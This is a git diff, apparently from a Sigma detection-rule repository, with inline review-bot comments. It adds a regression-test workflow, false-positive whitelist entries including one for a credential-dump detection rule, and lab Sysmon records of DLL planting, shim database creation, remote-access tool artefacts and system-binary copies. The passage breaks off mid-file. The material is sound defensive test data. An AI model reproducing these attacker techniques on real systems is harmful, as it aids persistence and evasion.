diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv
index 8da643d5e..7d1ae95bc 100644
--- a/.github/workflows/known-FPs.csv
+++ b/.github/workflows/known-FPs.csv
@@ -70,4 +70,6 @@ ef9dcfed-690c-4c5d-a9d1-482cd422225c;Browser Execution In Headless Mode;.*
 65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: (DESKTOP-6D0DBMB|WinDev2310Eval)
 de587dce-915e-4218-aac4-835ca6af6f70;Potential Persistence Attempt Via Run Keys Using Reg.EXE;\\Discord\\
 24357373-078f-44ed-9ac4-6d334a668a11;Direct Autorun Keys Modification;Discord\.exe
+8fbf3271-1ef6-4e94-8210-03c2317947f6;Cred Dump Tools Dropped Files;Svchost\.exe
+c7da8edc-49ae-45a2-9e61-9fd860e4e73d;PUA - Sysinternals Tools Execution - Registry;.*
 dcff7e85-d01f-4eb5-badd-84e2e6be8294;Windows Default Domain GPO Modification via GPME;Computer: WIN-FPV0DSIC9O6.sigma.fr
diff --git a/.github/workflows/regression-tests.yml b/.github/workflows/regression-tests.yml
new file mode 100644
index 000000000..ff56eb9e8
--- /dev/null
+++ b/.github/workflows/regression-tests.yml
@@ -0,0 +1,31 @@
+name: Regression Tests
+
+on: [push, pull_request, workflow_dispatch]
+
+env:
+ EVTX_BASELINE_VERSION: v0.8.2
+
+jobs:
+ true-positive-tests:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v5
+
+ - name: Set up Python
+ uses: actions/setup-python@v6
+ with:
+ python-version: '3.11'
+
+ - name: Install Python dependencies
+ run: |
+ python -m pip install --upgrade pip
+ pip install pyyaml
+
+ - name: Download evtx-sigma-checker
+ run: |
+ wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
+ chmod +x evtx-sigma-checker
+
+ - name: Run regression tests
+ run: |
+ python tests/regression_tests_runner.py --rules-paths rules rules-emerging-threats rules-threat-hunting --evtx-checker ./evtx-sigma-checker --thor-config tests/thor.yml --ignore-validation
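Review bot: The new `c7da8edc…;PUA - Sysinternals Tools Execution - Registry;.*` entry whitelists every baseline hit of that rule, so the rule drops out of false-positive regression entirely and any FP it produces in a future baseline run passes silently; the `.*` on the `ef9dcfed…` line in the hunk header shows there is precedent, but a pattern scoped to the artefact that actually fires (as the `Discord\.exe` entries do) keeps the rule under test. For `8fbf3271…;Cred Dump Tools Dropped Files;Svchost\.exe` the capital S stands out: the Sysmon records elsewhere in this commit spell the image `C:\Windows\System32\svchost.exe`, so if the matcher is case-sensitive this entry may not suppress the hit it was added for, which a run against the baseline would confirm either way. Whichever is intended, the list has no column for a justification, so noting in the commit message what produced the baseline hit would help the next person who has to touch these two lines.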
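Review bot: The `Download evtx-sigma-checker` step pulls an executable over the network and runs it on every push and pull request with no integrity check; `EVTX_BASELINE_VERSION` pins a release tag, but tags and release assets are mutable, so a pinned SHA-256 checked with `sha256sum -c` before `chmod +x` is the usual control (the hash below is a placeholder to be taken from the release). The workflow also declares no `permissions:` block, so the job's GITHUB_TOKEN inherits the repository default instead of the `contents: read` it actually needs, and `actions/checkout@v5` / `actions/setup-python@v6` are pinned to moving major tags rather than commit SHAs. `pip install pyyaml` is unpinned as well, which makes the run non-reproducible. Sketch of the first two changes:
```yaml
name: Regression Tests

on: [push, pull_request, workflow_dispatch]

permissions:
  contents: read

# … unchanged: env, job header, checkout, Python setup and pip steps …
      - name: Download evtx-sigma-checker
        run: |
          wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
          echo "<EXPECTED_SHA256_OF_RELEASE_ASSET>  evtx-sigma-checker" | sha256sum -c -
          chmod +x evtx-sigma-checker
# … unchanged: regression test step …
```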
diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx
new file mode 100644
index 000000000..21fd14fbb
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json
new file mode 100644
index 000000000..8e4e9362e
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:36:29.111126Z" + } + }, + "EventRecordID": 18267, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:36:29.110", + "ProcessGuid": "5AA13A44-0D74-68FC-EB1D-000000004002", + "ProcessId": 5624, + "Image": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\is-3C3LU.tmp\\Advanced_IP_Scanner_2.5.4594.1(1).tmp", + "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Advanced IP Scanner 2\\platforms\\qwindows.dll", + "CreationUtcTime": "2025-10-24 10:44:35.897", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml new file mode 100644 index 000000000..1485a4dc0 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml 
@@ -0,0 +1,13 @@
+id: 48ff85e7-a8ae-43fd-8a8f-16ce51a92183
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: fed85bf9-e075-4280-9159-fbe8a023d6fa
+ title: Advanced IP Scanner - File Event
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx
diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx
new file mode 100644
index 000000000..064b8b657
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json
new file mode 100644
index 000000000..0ead262af
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json
@@ -0,0 +1,255 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.640670Z" + } + }, + "EventRecordID": 14961, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.634", + "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", + "ProcessId": 7760, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.457", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.644616Z" + } + }, + "EventRecordID": 14963, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": 
"2025-10-24 23:34:34.634", + "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", + "ProcessId": 7760, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf~RF2d9c1fe.TMP", + "CreationUtcTime": "2025-10-24 23:34:34.634", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.649129Z" + } + }, + "EventRecordID": 14985, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.250", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.653476Z" + } + }, + 
"EventRecordID": 14988, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf~RF2d9c20d.TMP", + "CreationUtcTime": "2025-10-24 23:34:34.645", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.655191Z" + } + }, + "EventRecordID": 14990, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.250", + "User": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml
new file mode 100644
index 000000000..b0fd7e356
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml
@@ -0,0 +1,13 @@
+id: 0d7ff9a2-a55c-46c8-b878-4ec4ea8e91ae
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 0b9ad457-2554-44c1-82c2-d56a99c42377
+ title: Anydesk Temporary Artefact
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx
diff --git a/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx
new file mode 100644
index 000000000..a8f65532b
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json
new file mode 100644
index 000000000..2285fa237
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json
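Review bot: `match_count: 1` sits next to an evtx whose JSON export in the preceding section holds five Sysmon EventID 11 records for the AnyDesk `service.conf`/`user.conf` writes, and the cred-dump `info.yml` later in this commit does the same with six records, four of them `procdump*.exe` drops; whether one is the right number depends on whether the runner treats `match_count` as an exact count or a minimum, which is outside this diff, so if it is exact the value should be the number of records the rule really matches, and if it is a minimum a short comment on the field would save the next reader the same question. `description: N/A` on every new `info.yml` also leaves unrecorded how the samples were produced; from the `ar-win-dc.attackrange.local` hostname they look like lab captures, and one sentence such as `description: Sysmon EID 11 capture of AnyDesk writing its conf artefacts on a lab host` would document that without guessing. Both points apply to each `info.yml` in the commit, not only this one.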
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:36:53.996168Z" + } + }, + "EventRecordID": 19025, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:36:53.977", + "ProcessGuid": "5AA13A44-523E-68FB-1700-000000004002", + "ProcessId": 1276, + "Image": "C:\\Windows\\System32\\svchost.exe", + "TargetFilename": "C:\\Users\\Administrator\\Documents\\fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx", + "CreationUtcTime": "2025-10-24 23:36:52.320", + "User": "NT AUTHORITY\\LOCAL SERVICE" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml new file mode 100644 index 000000000..f3e1a4220 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml 
@@ -0,0 +1,13 @@
+id: afb1a75a-79c0-451e-b2dc-cb14fdc0e7ef
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb
+ title: EVTX Created In Uncommon Location
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx
diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx
new file mode 100644
index 000000000..05d7d921b
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json
new file mode 100644
index 000000000..e1a6beffc
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:38:31.938519Z" + } + }, + "EventRecordID": 20972, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:38:31.936", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\Windows\\System32\\WLBSCTRL.dll", + "CreationUtcTime": "2025-10-24 23:38:31.936", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml new file mode 100644 index 000000000..9af8facb1 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml @@ -0,0 +1,13 @@ +id: 8da08693-5638-4236-87b1-d04b4fcc5e84 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: df6ecb8b-7822-4f4b-b412-08f524b4576c + title: Creation Of Non-Existent System DLL +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx
new file mode 100644
index 000000000..e758a71f3
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json
new file mode 100644
index 000000000..a169ce960
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:39:53.705006Z" + } + }, + "EventRecordID": 22566, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:39:53.699", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Windows\\apppatch\\CustomSDB\\my_custom.sdb", + "CreationUtcTime": "2025-10-24 23:39:53.699", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml new file mode 100644 index 000000000..7c66c836a --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml @@ -0,0 +1,13 @@ +id: 094a2fb2-b1fd-4943-9379-c25e7ddb7136 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ee63c85c-6d51-4d12-ad09-04e25877a947 + title: New Custom Shim Database Created +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx
new file mode 100644
index 000000000..d4e9307b5
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json
new file mode 100644
index 000000000..53d3796c2
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:41:00.601559Z" + } + }, + "EventRecordID": 23503, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:41:00.589", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\tdh.dll", + "CreationUtcTime": "2025-10-24 23:41:00.589", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml new file mode 100644 index 000000000..3039b03b8 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml @@ -0,0 +1,13 @@ +id: 61017761-38ab-4224-a43f-6cc53b67e374 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 13c02350-4177-4e45-ac17-cf7ca628ff5e + title: Files With System DLL Name In Unsuspected Locations +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx
new file mode 100644
index 000000000..074dcff33
Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx differ
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json
new file mode 100644
index 000000000..75ad05708
--- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:41:48.497170Z" + } + }, + "EventRecordID": 24322, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:41:48.482", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\bitsadmin.exe", + "CreationUtcTime": "2025-10-24 23:41:48.482", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml new file mode 100644 index 000000000..858e84b3a --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml @@ -0,0 +1,13 @@ +id: e0123384-7d25-4178-b011-c1d37394d8dc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 